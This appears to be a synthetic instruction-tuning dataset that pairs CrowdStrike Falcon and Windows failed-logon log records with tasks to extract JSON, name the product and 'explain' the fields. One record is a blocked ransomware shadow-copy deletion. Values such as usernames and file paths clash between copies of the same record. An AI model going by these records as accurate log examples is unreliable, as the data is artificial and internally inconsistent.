pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | {
"clienthostname": "SSTEWART-LT3.undefined",
"clientmac": "00155d4a00da",
"filehash": "3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249",
"filename": "setup.exe",
"filepath": "\\Device\\HarddiskVolume3\\Users\\StevenStewart\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-06-12T13:04:28Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\charlie\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe /clone_wait \\\"/W32:8923024:1024\\\"\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"charlie\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889\",\"sha256\":\"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249\",\"md5\":\"8ca190715cd1b0f67a9e14ecbc7bc27e\",\"parent_details\":{\"parent_sha256\":\"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee\",\"parent_md5\":\"ab7850166bd390bb01602ddc766cc662\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\charlie\\\\Downloads\\\\TMVirtualPortDriver870a.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-06-12T13:04:28Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "33.80.171.219",
"userName": "charlie"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\charlie\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\charlie\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\charlie\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\charlie\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: SSTEWART-LT3.undefined
clientmac: 00155d4a00da
filehash: 3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249
filename: setup.exe
filepath: \Device\HarddiskVolume3\Users\StevenStewart\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-06-12T13:04:28Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 33.80.171.219
userName: charlie | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t63.128.8.62\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"63.128.8.62","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | {
"action": "Logon",
"clientport": 54979,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tjohndoe\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t63.128.8.62\\n\\tSource Port:\\t\\t54979\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"oscorp\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"63.128.8.62\",\"IpPort\":\"54979\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"johndoe\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":2060}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6122059274,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6122059274",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "63.128.8.62",
"userName": "johndoe"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t63.128.8.62\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"63.128.8.62","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tjohndoe\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t63.128.8.62\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"63.128.8.62","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"johndoe","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 54979
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6122059274
streamName: microsoft-windows-security-auditing
clientIP: 63.128.8.62
userName: johndoe | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-26T17:36:50.606Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-26T17:36:51.676Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t241.157.102.148\n\tSource Port:\t\t54979\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"241.157.102.148","IpPort":"54979","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":2060}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6122059274,"task":"Logon"}} | {
"action": "Logon",
"clientport": 54979,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-26T17:36:50.606Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-26T17:36:51.676Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad 